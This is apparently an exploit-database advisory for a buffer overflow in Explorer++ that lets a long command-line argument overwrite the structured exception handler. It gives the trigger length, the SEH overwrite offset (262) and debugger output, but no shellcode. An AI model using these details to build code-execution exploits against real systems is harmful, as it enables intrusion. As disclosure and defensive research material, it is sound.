# Exploit Title: Explorer32++ - Buffer overflow
# Discovery by: Rafael Pedrero
# Discovery Date: 2022-01-09
# Vendor Homepage:
# Software Link :
# Tested Version:
# Tested on:  Windows 10

CVSS v3: 7.3
CVSS vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
CWE: CWE-119

Buffer overflow controlling the Structured Exception Handler (SEH) records
in Explorer++, and possibly other versions, may allow attackers
to execute arbitrary code via a long file name argument.

Proof of concept:

Open Explorer32++.exe from command line with a large string in Arguments,
more than 396 chars:

File '<Explorer++_PATH>\Explorer32++.exe'

SEH chain of main thread
Address    SE handler
0018FB14   00690041
00370069   *** CORRUPT ENTRY ***

0BADF00D   [+] Examining SEH chain
0BADF00D       SEH record (nseh field) at 0x0018fb14 overwritten with
unicode pattern : 0x00370069 (offset 262), followed by 626 bytes of cyclic
data after the handler